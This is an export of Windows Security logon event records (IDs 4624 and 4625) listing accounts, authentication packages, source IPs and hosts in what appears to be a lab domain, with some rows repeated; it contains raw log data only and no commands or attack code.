- + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:57.252932+04:00,1599047277.252932,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171294 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x21aa47f + 3 + Kerberos + Kerberos + - + 27FCE179-F80F-F6A6-7DF4-C247E783B072 + - + - + 0 + 0x0 + - + ::1 + 62860 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.959767+04:00,1599047268.959767,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171292 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + THREEBEESCO.COM + 0x21a8c9a + 3 + Kerberos + Kerberos + - + 467413FE-B054-D9AE-C758-B41105A3ECA9 + - + - + 0 + 0x0 + - + 172.16.66.142 + 60726 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.842119+04:00,1599047268.842119,4624,a-jbrown,THREEBEESCO.COM,3,Kerberos,172.16.66.142,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171291 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + THREEBEESCO.COM + 0x21a8c80 + 3 + Kerberos + Kerberos + - + 467413FE-B054-D9AE-C758-B41105A3ECA9 + - + - + 0 + 0x0 + - + 172.16.66.142 + 60728 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-02T15:47:48.823276+04:00,1599047268.823276,4624,a-jbrown,3B,3,NtLmSsp,172.16.66.142,04246W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2171290 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x21a8c68 + 3 + NtLmSsp + NTLM + 04246W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.142 + 60726 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2019-05-11T21:10:10.889320+04:00,1557594610.88932,4624,IEUser,IEWIN7,9,seclogo,::1,,IEWIN7,Security," + + + + + 4624 + 0 + 0 + 12544 + 0 + 0x8020000000000000 + + + 18206 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1371b + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1bbdce + 9 + seclogo + Negotiate + + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x3c8 + C:\Windows\System32\svchost.exe + ::1 + 0 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769798 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x85516e + 3 + Kerberos + Kerberos + - + 063B0961-D1B7-6D2C-1FF3-98764C4FAC9D + - + - + 0 + 0x0 + - + ::1 + 53668 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-17T14:57:44.272505+04:00,1600340264.272505,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 769794 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x853237 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 49959 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988525 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56738f + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64223 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988522 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-84104 + 02694W-WIN10$ + THREEBEESCO.COM + 0x567343 + 3 + Kerberos + Kerberos + - + 429CA5A3-EDFC-5657-17C3-C050C7B047F4 + - + - + 0 + 0x0 + - + 172.16.66.25 + 50250 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772611 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1137987 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50107 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772609 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-5-18 + 01566S-WIN16-IR$ + 3B + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x244 + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 772607 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-500 + Administrator + 3B + 0x1136e95 + 3 + NtLmSsp + NTLM + - + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.37 + 50106 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768628 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x32a0d3 + 3 + Kerberos + Kerberos + - + 6747BCF0-DBAA-F21C-878B-EB339B03FA80 + - + - + 0 + 0x0 + - + ::1 + 50441 + %%1840 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768627 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x329baa + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50443 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768622 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x320935 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50438 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768621 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff89 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768620 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-7 + ANONYMOUS LOGON + NT AUTHORITY + 0x31ff6e + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V1 + 128 + 0x0 + - + 172.16.66.37 + 49707 + %%1833 + - + - + - + %%1843 + 0x0 + %%1843 + +" +2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768619 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31fb1a + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50437 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 768618 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x31daf6 + 3 + Kerberos + Kerberos + - + 1EC715BD-2DAC-8C05-8940-40F79E2D2D52 + - + - + 0 + 0x0 + - + ::1 + 50436 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137225 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd964 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd8f6 + %%1843 + +" +2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137224 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x1cd8f6 + 2 + Chrome + Negotiate + MSEDGEWIN10 + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + %%1833 + - + - + - + %%1843 + 0x1cd964 + %%1842 + +" +2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 137223 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-18 + MSEDGEWIN10$ + WORKGROUP + 0x3e7 + S-1-5-18 + SYSTEM + NT AUTHORITY + 0x3e7 + 5 + Advapi + Negotiate + - + 00000000-0000-0000-0000-000000000000 + - + - + 0 + 0x25c + C:\Windows\System32\services.exe + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security," + + + + + 4625 + 0 + 0 + 12544 + 0 + 0x8010000000000000 + + + 137222 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x79e59 + S-1-0-0 + IEUser + MSEDGEWIN10 + 0xc000006d + %%2313 + 0xc000006a + 2 + Chrome + Negotiate + MSEDGEWIN10 + - + - + 0 + 0x1358 + C:\Program Files (x86)\Google\Chrome\Application\chrome.exe + - + - + +" +2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988550 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x568d99 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64229 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988547 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x56874b + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64227 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988544 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-18 + 01566S-WIN16-IR$ + THREEBEESCO.COM + 0x5686d9 + 3 + Kerberos + Kerberos + - + B683BAFB-5884-30E1-12DA-31368F04511D + - + - + 0 + 0x0 + - + ::1 + 64226 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988535 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567758 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + - + - + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" +2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security," + + + + + 4624 + 2 + 0 + 12544 + 0 + 0x8020000000000000 + + + 2988529 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + S-1-0-0 + - + - + 0x0 + S-1-5-21-308926384-506822093-3341789130-220106 + samir + 3B + 0x567515 + 3 + NtLmSsp + NTLM + 02694W-WIN10 + 00000000-0000-0000-0000-000000000000 + - + NTLM V2 + 128 + 0x0 + - + 172.16.66.25 + 50251 + %%1833 + - + - + - + %%1843 + 0x0 + %%1842 + +" 